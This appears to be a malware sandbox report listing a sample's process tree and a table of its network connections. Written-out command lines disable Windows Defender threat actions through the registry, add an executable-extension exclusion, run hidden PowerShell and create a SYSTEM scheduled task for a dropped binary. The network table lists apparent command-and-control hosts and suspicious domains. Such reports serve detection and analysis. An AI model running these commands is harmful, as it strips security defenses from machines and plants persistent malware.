/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\ProgramData\cmd.exe

C:\ProgramData\cmd.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe\" PP /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe PP /S

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 filescan.io udp
US 172.67.70.67:443 filescan.io tcp
US 172.67.70.67:443 filescan.io tcp
US 8.8.8.8:53 www.filescan.io udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.26.14.230:443 www.filescan.io udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 67.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 230.14.26.104.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 cdn-cookieyes.com udp
US 104.26.14.230:443 www.filescan.io udp
US 104.22.58.91:443 cdn-cookieyes.com tcp
US 8.8.8.8:53 log.cookieyes.com udp
IE 52.31.17.134:443 log.cookieyes.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com udp
US 104.22.58.91:443 cdn-cookieyes.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 platform.twitter.com udp
GB 172.217.169.74:443 content-autofill.googleapis.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 91.58.22.104.in-addr.arpa udp
US 8.8.8.8:53 134.17.31.52.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 25.233.229.192.in-addr.arpa udp
GB 172.217.169.74:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 syndication.twitter.com udp
US 104.244.42.200:443 syndication.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
US 8.8.8.8:53 200.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 directory.cookieyes.com udp
IE 52.210.197.119:443 directory.cookieyes.com tcp
US 8.8.8.8:53 119.197.210.52.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 147.45.47.70:80 147.45.47.70 tcp
CN 124.71.81.174:80 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 8.8.8.8:53 118.194.13.49.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
RU 88.212.252.98:443 softcatalog.ru tcp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
IE 54.76.174.118:80 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
SG 118.194.235.187:50500 tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
MD 94.103.188.126:80 94.103.188.126 tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
US 8.8.8.8:53 187.235.194.118.in-addr.arpa udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 99.86.249.221:80 sd.p.360safe.com tcp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 221.249.86.99.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 pepecasas123.net udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 90.205.10.195.in-addr.arpa udp
DE 49.13.194.118:53848 tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
NL 185.73.125.6:80 185.73.125.6 tcp
US 8.8.8.8:53 6.125.73.185.in-addr.arpa udp
CN 119.91.25.19:8888 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
SG 118.194.235.187:50500 tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
RU 91.215.85.135:80 91.215.85.135 tcp
US 8.8.8.8:53 135.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 49.192.11.51.in-addr.arpa udp
US 8.8.8.8:53 files2.tech udp
SG 118.194.235.187:50500 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
DE 77.91.77.33:80 77.91.77.33 tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 33.77.91.77.in-addr.arpa udp
EE 45.129.96.86:80 45.129.96.86 tcp
US 8.8.8.8:53 86.96.129.45.in-addr.arpa udp
US 8.8.8.8:53 doggie-services.com udp
US 8.8.8.8:53 fragmentyperspowp.shop udp
US 104.21.20.181:443 fragmentyperspowp.shop tcp
US 8.8.8.8:53 ipinfo.io udp
FR 5.42.67.23:80 doggie-services.com tcp
US 8.8.8.8:53 181.20.21.104.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 34.117.186.192:443 ipinfo.io tcp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 172.67.75.166:443 db-ip.com tcp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 23.67.42.5.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 patternapplauderw.shop udp
US 172.67.174.208:443 patternapplauderw.shop tcp
US 8.8.8.8:53 118.74.21.104.in-addr.arpa udp
N/A 10.127.0.1:135 tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
RU 195.2.70.38:30001 195.2.70.38 tcp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 208.174.67.172.in-addr.arpa udp
RU 94.103.90.9:25349 tcp
DE 49.13.194.118:80 49.13.194.118 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 38.70.2.195.in-addr.arpa udp
US 8.8.8.8:53 201.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 8.8.8.8:53 9.90.103.94.in-addr.arpa udp
US 8.8.8.8:53 57.170.67.172.in-addr.arpa udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 8.8.8.8:53 238.8.21.104.in-addr.arpa udp
US 8.8.8.8:53 69.128.172.185.in-addr.arpa udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 11.193.67.172.in-addr.arpa udp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
US 172.67.190.237:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 237.190.67.172.in-addr.arpa udp
KR 43.155.163.53:24543 tcp
RU 147.45.47.155:80 147.45.47.155 tcp
US 8.8.8.8:53 53.163.155.43.in-addr.arpa udp
N/A 10.127.0.1:135 tcp
KR 43.155.163.53:24543 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.55.87:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 gigapub.ma udp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 87.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
US 8.8.8.8:53 museumtespaceorsp.shop udp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 80.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 172.67.218.187:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 187.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
KR 43.155.163.53:24543 tcp
US 8.8.8.8:53 163.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 104.21.85.81:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 8.8.8.8:53 81.85.21.104.in-addr.arpa udp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 197.3.21.104.in-addr.arpa udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
N/A 10.127.0.1:445 tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
DE 52.29.179.141:80 s.360safe.com tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 146.197.67.172.in-addr.arpa udp
GB 85.192.56.26:80 85.192.56.26 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 26.56.192.85.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
RU 147.45.47.126:58709 tcp
US 8.8.8.8:53 126.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
GB 85.192.56.26:80 85.192.56.26 tcp
DE 185.172.128.69:80 185.172.128.69 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
TM 91.202.233.232:80 91.202.233.232 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
DE 185.172.128.159:80 185.172.128.159 tcp
US 8.8.8.8:53 lop.foxesjoy.com udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 monoblocked.com udp
BG 94.232.45.38:80 94.232.45.38 tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 172.67.159.232:80 lop.foxesjoy.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 172.67.159.232:80 lop.foxesjoy.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 159.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 38.45.232.94.in-addr.arpa udp
US 8.8.8.8:53 232.233.202.91.in-addr.arpa udp
US 8.8.8.8:53 194.225.186.93.in-addr.arpa udp
US 172.67.159.232:80 lop.foxesjoy.com tcp
US 172.67.159.232:443 lop.foxesjoy.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 8.8.8.8:53 www.facebook.com udp
RU 45.130.41.108:80 monoblocked.com tcp
US 8.8.8.8:53 www.youtube.com udp
GB 163.70.151.35:443 www.facebook.com tcp
GB 163.70.151.35:443 www.facebook.com tcp
GB 172.217.16.238:443 www.youtube.com tcp
GB 172.217.16.238:443 www.youtube.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 232.159.67.172.in-addr.arpa udp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
DE 136.243.76.170:445 tcp
DE 136.243.76.170:139 tcp
US 8.8.8.8:53 f.123654987.xyz udp
RU 5.42.66.10:80 5.42.66.10 tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
RU 93.186.225.194:443 vk.com tcp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
